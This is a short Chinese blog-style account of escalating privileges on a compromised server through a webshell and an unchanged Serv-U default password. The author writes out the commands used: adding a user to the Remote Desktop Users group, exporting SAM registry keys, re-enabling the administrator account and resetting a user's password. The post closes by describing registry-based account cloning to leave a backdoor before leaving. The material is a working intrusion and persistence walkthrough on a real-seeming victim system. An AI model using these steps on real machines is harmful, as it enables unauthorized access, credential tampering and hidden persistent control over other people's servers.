巧用SU添加管理帐号

今天朋友扔来一webshell让提权，SU默认密码没改，可执行命令，添加管理员后登陆,出现没有权限

估计是组策略设置了管理组没入终端登陆组,然后net localgroup "Remote Desktop Users" user /add

朋友说还不行,然后就准备reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

然后修改administrator密码登陆,晕,竟然给禁用了,

net user administrator /active:yes 启用管理员帐号登陆

还是没有权限,看来真的是默认管理组没有终端登陆权限,或者设置了默认管理员的权限

继续...net localgroup "remotedesktop users"查看终端用户

reg export HKLM\SAM\SAM\Domains\Account\Users c:\user.reg 把全部用户备份

然后随便修改一个终端组的用户密码登陆.yeah.成功.

然后把修改过的密码的帐号注册表文件全都导入,克隆帐号,留后门.

闪人...